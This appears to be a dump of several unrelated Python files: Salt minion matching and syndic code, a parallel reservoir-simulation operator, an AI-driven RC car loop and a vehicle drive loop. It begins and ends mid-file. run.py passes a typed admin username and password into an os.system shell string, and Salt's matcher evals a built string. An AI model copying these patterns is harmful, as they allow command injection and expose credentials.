# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
# Proxies have a chicken-and-egg problem. Usually we load grains early
# in the setup process, but we can't load grains for proxies until
# we talk to the device we are proxying for. So reload the grains
# functions here, and then force a grains sync in modules_refresh
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh=True)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
paralel_ams_new0.py
|
import numpy as np
import scipy.sparse as sp
from scipy.sparse import linalg
from .ams_tpfa_new0 import AMSTpfa
from .....common_files.common_infos import CommonInfos
import multiprocessing as mp
import collections
import time
def run_thing(local_operator_obj):
local_operator_obj.run()
class SubDomain(CommonInfos):
def __init__(self,
T: 'global transmissibility matrix',
g_local_ids: 'global id of local volumes',
dual_flags: 'dual flags of g_local_ids',
primal_ids: 'primal ids of g_local_ids',
get_correction_term=False,
B_matrix=None,
Eps_matrix=None,
total_source_term=None):
dual_ids = dual_flags
self.get_correction_term = get_correction_term
if get_correction_term:
self.l_B_matrix = self.get_local_matrix(B_matrix, g_local_ids)
self.l_Eps_matrix = self.get_local_matrix(Eps_matrix, g_local_ids)
self.l_total_source_term = total_source_term[g_local_ids]
else:
self.l_B_matrix = None
self.l_Eps_matrix = None
self.l_total_source_term = None
self.l_dual_flags = dual_flags
self.l_T = self.get_local_t(T, g_local_ids) # local transmissibility
self.g_local_ids = g_local_ids
local_dual_id = dual_ids
g_vertices = g_local_ids[local_dual_id==3]
global_primal_ids = primal_ids
local_primal_ids = np.arange(len(g_vertices))
primal_ids_vertices = primal_ids[local_dual_id==3]
map_primal_ids = dict(zip(primal_ids_vertices, local_primal_ids))
self.r_map_primal_ids = dict(zip(local_primal_ids, primal_ids_vertices))
self.local_ids = np.arange(len(g_local_ids))
# map_gids = dict(zip(g_local_ids, self.local_ids))
# map_gids = np.repeat(-1, g_local_ids.max()+1)
# map_gids[g_local_ids] = self.local_ids
self.l_primal_ids = np.array([map_primal_ids[k] for k in global_primal_ids])
# self.l_interns = self.local_ids[local_dual_id==0]
# self.l_faces = self.local_ids[local_dual_id==1]
# self.l_edges = self.local_ids[local_dual_id==2]
# self.l_vertices = self.local_ids[local_dual_id==3]
class LocalOperator:
def __init__(self,
subDomains: 'list of SubDomains',
comm: 'comunicator'
):
self.subdomains = subDomains
self.comm = comm
def run(self):
lines = []
cols = []
data = []
all_pcorr = []
for subd in self.subdomains:
operator = AMSTpfa(subd.local_ids, subd.l_dual_flags, subd.l_primal_ids, get_correction_term=subd.get_correction_term)
op, pcorr = operator.run(subd.l_T, total_source_term=subd.l_total_source_term, B_matrix=subd.l_B_matrix, Eps_matrix=subd.l_Eps_matrix)
subd.local_ids[:] = subd.g_local_ids
ff = sp.find(op)
ls = subd.local_ids[ff[0]]
cs = np.array([subd.r_map_primal_ids[k] for k in ff[1]])
ds = ff[2]
lines.append(ls)
cols.append(cs)
data.append(ds)
all_pcorr.append(np.array([subd.g_local_ids, pcorr]))
structure = np.array([lines, cols, data, all_pcorr])
self.comm.send(structure)
class MasterOP:
def __init__(self,
T: 'global transmissibility matrix',
all_dual_subsets: 'all dual volumes',
level,
get_correction_term=False,
total_source_term=None,
B_matrix=None,
Eps_matrix=None):
n_cpu = mp.cpu_count()
self.n_workers = n_cpu
self.level = level
self.n_total = T.shape[0]
self.get_correction_term = get_correction_term
list_of_subdomains = self.get_list_subdomains(T, all_dual_subsets, get_correction_term, B_matrix=B_matrix,
Eps_matrix=Eps_matrix, total_source_term=total_source_term)
list_of_process_per_cpu = []
n_subdomains = len(list_of_subdomains)
resto = n_subdomains % self.n_workers
n_process_per_cpu = n_subdomains//self.n_workers
if n_process_per_cpu > 0:
for i in range(self.n_workers):
list_of_process_per_cpu.append(list_of_subdomains[i*n_process_per_cpu:n_process_per_cpu*(i+1)])
if resto != 0:
for i in range(resto):
list_of_process_per_cpu[i].append(list_of_subdomains[-i])
else:
self.n_workers = resto
for i in range(resto):
list_of_process_per_cpu[i].append(list_of_subdomains[-i])
self.list_of_process_per_cpu = list_of_process_per_cpu
def get_list_subdomains(self, T, all_dual_subsets, get_correction_term=False, B_matrix=None, Eps_matrix=None, total_source_term=None):
list_of_subdomains = []
for dual_subset in all_dual_subsets:
sarray = dual_subset
volumes = sarray['volumes']
dual_ids1 = sarray['dual_id']
primal_ids1 = sarray['primal_id']
# all_edges = volumes[dual_ids1==2]
# contador = collections.Counter(all_edges)
# coupled_edges = np.array([k for k, v in contador.items() if v > 1])
# local_gids = np.unique(volumes)
local_gids = volumes
# dual_ids = np.concatenate([dual_ids1[volumes==k] for k in local_gids])
dual_ids = dual_ids1
# primal_ids = np.concatenate([primal_ids1[volumes==k] for k in local_gids])
primal_ids = primal_ids1
list_of_subdomains.append(SubDomain(T, local_gids, dual_ids, primal_ids, get_correction_term=get_correction_term, B_matrix=B_matrix, Eps_matrix=Eps_matrix, total_source_term=total_source_term))
return list_of_subdomains
def get_data_for_op(self, all_lines, all_cols, all_datas, set_lines):
lines = []
cols = []
data = []
ps = []
for ls, cs, ds in zip(all_lines, all_cols, all_datas):
resp = set(ls) - set_lines
if resp:
conj_lines = []
for k in resp:
indice = np.where(ls == k)[0]
conj_lines.append(indice)
conj_lines = np.concatenate(conj_lines)
resp_ls = ls[conj_lines]
resp_cols = cs[conj_lines]
resp_data = ds[conj_lines]
lines.append(resp_ls)
cols.append(resp_cols)
data.append(resp_data)
set_lines = set_lines | resp
lines = np.concatenate(lines).astype(np.int64)
cols = np.concatenate(cols).astype(np.int64)
data = np.concatenate(data)
return lines, cols, data, set_lines
def run(self):
master2worker = [mp.Pipe() for _ in range(self.n_workers)]
m2w, w2m = list(zip(*master2worker))
procs = [mp.Process(target=run_thing, args=[LocalOperator(obj, comm)]) for obj, comm in zip(self.list_of_process_per_cpu, w2m)]
del self.list_of_process_per_cpu
lines = []
cols = []
data = []
pcorr = np.zeros(self.n_total)
set_lines = set()
for proc in procs:
proc.start()
for comm in m2w:
msg = comm.recv()
resp = msg
all_lines = resp[0]
all_cols = resp[1]
all_datas = resp[2]
all_pcorr = resp[3]
ls, cs, ds, set_lines = self.get_data_for_op(all_lines, all_cols, all_datas, set_lines)
lines.append(ls)
cols.append(cs)
data.append(ds)
for ppp in all_pcorr:
pcorr[ppp[0].astype(int)] = ppp[1]
for proc in procs:
proc.join()
lines = np.concatenate(lines).astype(np.int64)
cols = np.concatenate(cols).astype(np.int64)
data = np.concatenate(data)
n_volumes = lines.max() + 1
n_c_volumes = cols.max() + 1
OP = sp.csc_matrix((data, (lines, cols)), shape=(n_volumes, n_c_volumes))
return OP, pcorr
|
run_car_ai.py
|
# coding: utf-8
# ラジコン自走コード
import time
import logging
import threading
import numpy as np
from lib import Kerberos
from lib import Car
from lib import SPI
from lib import AI
from generator import SensorGenerator
import copy
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import Queue
elif PY3:
import queue as Queue
# ログ設定
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] time:%(created).8f pid:%(process)d pn:%(processName)-10s tid:%(thread)d tn:%(threadName)-10s fn:%(funcName)-10s %(message)s',
)
########################################
# ステータス
########################################
MAIN_THREAD_RUN = True
FORCE_STOP_THREAD_RUN = True
########################################
# 停止ボタンの値を取得し続ける関数
########################################
def do_force_stop_button():
global FORCE_STOP_THREAD_RUN
global MAIN_THREAD_RUN
# 停止ボタン準備
A0 = 0 # SPI PIN
STOP_BUTTON_SPI_PIN = A0
spi = SPI()
while FORCE_STOP_THREAD_RUN:
data = spi.readadc(STOP_BUTTON_SPI_PIN)
if data >= 1000:
# 停止ボタンが押された
MAIN_THREAD_RUN = False
FORCE_STOP_THREAD_RUN = False
break
time.sleep(0.1)
return
'''
メイン処理を行う部分
'''
def main():
global MAIN_THREAD_RUN
global FORCE_STOP_THREAD_RUN
# CAR準備
STOP=0
LEFT=1
FORWARD=2
RIGHT=3
HANDLE_NEUTRAL = 95 # ステアリングニュートラル位置
HANDLE_ANGLE = 42 # 左右最大アングル
car = Car()
speed = 0
angle = HANDLE_NEUTRAL
ratio = 1.0 # 角度制御率
count_stop = 0 # 停止判断の連続回数
# AI準備
ai = AI()
score = 0.6 # スコア閾値
back_forward = 5 # バック時、真っ直ぐバックする回数
back_angle = 7 # バック時、近距離センサーを用いてバックする回数
max_log_length = 20 # ハンドル操作ログの保持数 max_log_length > back_forward
log_queue = Queue.Queue(maxsize=max_log_length) # バック時に使うためにAI予測結果を保持する
copy_log_queue = Queue.Queue(maxsize=max_log_length) # 連続バック動作のためのlog_queueバックアップキュー
back_queue = Queue.LifoQueue(maxsize=max_log_length) # バック方向キュー
# IF準備 (AI学習データジェネレータ)
generator = SensorGenerator()
# 近接センサー準備
kerberos = Kerberos()
LIDAR_INTERVAL = 0.05
try:
learned_step = ai.get_learned_step()
print("learned_step:{}".format(learned_step))
while MAIN_THREAD_RUN:
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
########################################
# 近接センサー値を取得する
########################################
'''
速度、角度制御を入れるので距離はここで取る
'''
distance1,distance2,distance3 = kerberos.get_distance()
sensors = [distance1,distance2,distance3]
########################################
# AI予測結果を取得する
########################################
# 今回の予測結果を取得する
ai_value = ai.get_prediction(sensors,score)
########################################
# IF結果を取得する
########################################
# 今回の結果を取得する
#w = generator.driving_instruction(sensors)
#ai_value = np.argmax(w[0:4])
print("ai_value:{} {}".format(ai_value,sensors))
# 予測結果のスコアが低い時は何もしない
if ai_value == ai.get_other_label():
time.sleep(LIDAR_INTERVAL)
continue
########################################
# 速度調整を行う
########################################
if distance2 >= 100:
speed = 100
else:
speed = int(distance2 + (100 - distance2)/2)
if speed < 40:
speed = 40
########################################
# ハンドル角調整を行う
########################################
if ai_value == 1: # 左に行くけど、左右スペース比で舵角を制御する
ratio = float(distance1)/(distance1 + distance3) # 角度をパーセント減にする
if distance2 < 75 or distance3 < 8.0 :
ratio = 1.0
elif ai_value == 3: # 右に行くけど、左右スペース比で舵角を制御する
ratio = float(distance3)/(distance1 + distance3) # 角度をパーセント減にする
if distance2 < 75 or distance1 < 8.0 :
ratio = 1.0
else:
ratio = 1.0
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
########################################
# ロボットカーを 前進、左右、停止 する
########################################
if ai_value == STOP:
car.stop()
car.set_angle(HANDLE_NEUTRAL)
elif ai_value == LEFT:
car.set_angle(HANDLE_NEUTRAL - (HANDLE_ANGLE * ratio))
car.forward(speed)
elif ai_value == FORWARD:
car.forward(speed)
car.set_angle(HANDLE_NEUTRAL)
elif ai_value == RIGHT:
car.set_angle(HANDLE_NEUTRAL + (HANDLE_ANGLE * ratio))
car.forward(speed)
########################################
# もし停止なら、ロボットカーを後進する
########################################
'''
バック時、直前のハンドルログからN件分を真っ直ぐバックし、M件分を逆ハンドルでバックする
その後、狭い方にハンドルを切ってバックする
'''
if ai_value == STOP:
time.sleep(1) # 停止後1秒、車体が安定するまで待つ
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
count_stop += 1
if count_stop >= 1:
# バック時のハンドル操作キューを作成する
copy_log_queue.queue = copy.deepcopy(log_queue.queue)
# ハンドル操作キューが足りない時はバックハンドル操作を前進にする
if log_queue.qsize() < max_log_length:
for i in range(log_queue.qsize(),max_log_length):
back_queue.put(FORWARD)
while not log_queue.empty():
back_queue.put(log_queue.get(block=False))
log_queue.queue = copy.deepcopy(copy_log_queue.queue)
speed = 60
car.back(speed) # バックする
####################
# N件分を真っ直ぐバックする
####################
for i in range(0,back_forward):
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
car.set_angle(HANDLE_NEUTRAL)
# N件分をバックハンドル操作キューから削除する
back_queue.get(block=False)
time.sleep(LIDAR_INTERVAL)
####################
# 残りのログ分のハンドル操作の最大方向をハンドルに設定する
####################
angle = 0 # 左右どちらが多いか
angle_forward = 0 # 前進方向の回数
back_queue_size = back_queue.qsize()
for i in range(0,back_queue_size):
value = back_queue.get(block=False)
if value == RIGHT:
angle += 1
elif value == LEFT:
angle -= 1
elif value == FORWARD:
angle_forward +=1
if angle_forward >= back_queue_size/3: # ハンドルログは前進が多いので真っ直ぐバックする
back = FORWARD
elif angle > 0: # ハンドルログは左が多いので右にバッグする
back = RIGHT
else: # ハンドルログは右が多いので左にバックする
back = LEFT
for i in range(0,back_queue_size):
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
if back == LEFT:
car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # 直前のハンドル方向とは逆の右にハンドルを切る
elif back == RIGHT:
car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # 直前のハンドル方向とは逆の左にハンドルを切る
elif back == FORWARD:
car.set_angle(HANDLE_NEUTRAL)
time.sleep(LIDAR_INTERVAL)
'''
# M件分を1回の近距離センサー値を用いてバックする
distance1,distance2,distance3 = kerberos.get_distance()
for i in range(0,back_angle):
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
if distance1 >= distance3: # 右の方が狭いので右にハンドルを切る
car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # 右にハンドルを切る
else:
car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # 左にハンドルを切る
time.sleep(LIDAR_INTERVAL)
'''
####################
# ここで左,前,右に20cm以上の空きスペースを見つけられない場合はひたすらバックする
####################
speed=60
car.back(speed) # バックする
while True:
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
distance1,distance2,distance3 = kerberos.get_distance()
if distance1 > 20 and distance2 > 20 and distance3 > 20:
break
if distance1 >= distance3*2: # 右の方が圧倒的に狭いので右にハンドルを切る
car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # 右にハンドルを切る
elif distance3 >= distance1*2: # 左の方が圧倒的に狭いので左にハンドルを切る
car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # 左にハンドルを切る
elif distance1 >= distance3: # 右に少しハンドルを切る
ratio = float(distance3)/(distance1 + distance3) # 角度をパーセント減にする
car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE*ratio) # 右にハンドルを切る
elif distance3 >= distance1: # 左に少しハンドルを切る
ratio = float(distance1)/(distance1 + distance3) # 角度をパーセント減にする
car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE*ratio) # 左にハンドルを切る
time.sleep(0.1)
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
car.stop()
count_stop = 0
ai_value = 0
speed = 0
time.sleep(0.5) # 停止後0.5秒待つ
car.set_angle(HANDLE_NEUTRAL)
time.sleep(0.5) # 停止後ハンドル修正0.5秒待つ
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
else:
if not FORCE_STOP_THREAD_RUN: break # 強制停止ならループを抜ける
count_stop = 0
# 前進の時は直前のハンドル操作を記憶する
qsize = log_queue.qsize()
if qsize >= max_log_length:
log_queue.get(block=False)
qsize = log_queue.qsize()
log_queue.put(ai_value)
time.sleep(LIDAR_INTERVAL)
except:
import traceback
traceback.print_exc()
print('error! main failed.')
finally:
print("main end")
# ボタンスレッドを停止させる
FORCE_STOP_THREAD_RUN = False
car.stop()
car.set_angle(HANDLE_NEUTRAL)
pass
return
if __name__ == '__main__':
# 停止ボタンの状態を監視するスレッドを起動する
t = threading.Thread(target=do_force_stop_button,args=())
t.start()
main()
|
run.py
|
from multiprocessing import Process
import os
from getpass import getpass
def func1(usrn,passw):
string = 'node bin/cloudcmd.js -u '+usrn+' -p '+ passw + ' --root ../files'
os.system(string)
def func2():
os.system('node ./lib/index.js -d ../files/upload')
if __name__ == '__main__':
os.chdir('admin')
os.system('npm install')
os.system('npm run build')
usern = raw_input("Enter your admin user name : ")
passw = getpass("Enter your admin password: ")
p1 = Process(target=func1, args=(usern,passw))
p1.start()
os.chdir('../file_man')
os.system('npm install')
p2 = Process(target=func2)
p2.start()
p1.join()
p2.join()
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
from builtins import bool
from threading import Thread
import time
from .log import get_logger
from .memory import Memory
logger = get_logger(__name__)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.current_drive_mode=None
self.current_cam_status=None
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition: boolean
If a part should be run at all.
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
logger.info('Adding part {}.'.format(p.__class__.__name__))
entry = dict()
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def start(self, rate_hz=10, max_loop_count=None):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinit loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maxiumum number of loops the drive loop should execute. This is
used for testing the all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
logger.info('Starting vehicle...')
time.sleep(1)
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
finally:
